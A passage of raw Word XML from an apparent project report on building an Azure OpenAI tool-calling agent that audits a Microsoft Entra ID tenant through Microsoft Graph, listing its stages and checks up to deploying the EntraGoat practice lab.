            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BDEBECA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>App registration, Graph permissions, graph_client.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6B7280"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B4A2512" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5947C0F6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="568107D8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2 – Agent Data Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F16DD4F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>entra_agent.py tool-calling loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6B7280"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B34F27F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="04E7C090" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30C27A81" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3 – Audit Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FE2783D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Five automated audit checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6B7280"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E2B79AE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5ADF085E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49D2F834" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4 – EntraGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D88BCF4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scenario 1 solved; Scenarios 2–5 planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6B7280"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41C5C338" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3950F3DD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A82678" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc243301420"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Stage-by-Stage Detail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5AD8CAD8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc243301421"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 0 — AI Playground</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="49EAA70C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Provisioned an Azure OpenAI resource in the Cybersteps tenant and deployed the gpt-5-mini chat model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A174463" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Built hello.py: a minimal single-turn chat completion script to validate the Azure OpenAI connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A75950" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tested system-prompt variations to observe how they change model behavior and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A399E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Built agent.py: a first tool-calling loop with a simple get_current_time function, proving the model could select and invoke a tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D211713" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc243301422"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 1 — Connect to Entra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="197F01FB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registered the entra-audit-agent application in the Pearson tenant (Entra ID &gt; App registrations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BB800" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Added Microsoft Graph application permissions: User.Read.All, Directory.Read.All, Policy.Read.All, RoleManagement.Read.Directory, later extended with AuditLog.Read.All; granted tenant-wide admin consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EAC37" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Created a client secret for the app registration and stored tenant ID, client ID and secret in a local .env file (excluded from source control via .gitignore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31C07A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Built graph_client.py implementing client-credential (app-only) authentication via MSAL and a paged graph_get() helper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1E3F5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implemented and tested baseline queries: get_users, get_global_admins, get_ca_policies, get_guests, get_mfa_status, get_service_principals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74830D76" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc243301423"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 2 — Agent Data Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="62A85170" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Built entra_agent.py: wraps each graph_client.py function as an OpenAI tool definition and runs a tool-calling loop so the model can query live tenant data on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E493357" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Validated with natural-language questions (e.g. “Who are the Global Admins?”) and confirmed answers matched the Entra portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094381E7" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MCP server integration was identified as optional in the project brief and was not implemented in this round.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB209A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc243301424"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stage 3 — Audit Logic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5A7EC228" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implemented check_legacy_auth_blocked: verifies an enabled Conditional Access policy blocks legacy authentication clients tenant-wide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB6F71" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implemented check_admin_mfa_policy and get_admins_without_mfa: flags admins lacking MFA registration or CA coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F2602" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implemented get_risky_service_principals: scans own-tenant service principals for high-risk Microsoft Graph application permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001DA0B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implemented get_security_defaults to avoid false positives when Conditional Access is absent but Security Defaults is enforced instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02169E22" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Standardized the system prompt so every finding is reported as Finding / Risk / Fix / Severity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD326D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc243301425"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stage 4 — EntraGoat (this report's focus)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4D4462A8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deployed EntraGoat into the Pearson tenant using the PowerShell GUI (Start-EntraGoat.ps1), signed in as Global Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53899674" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
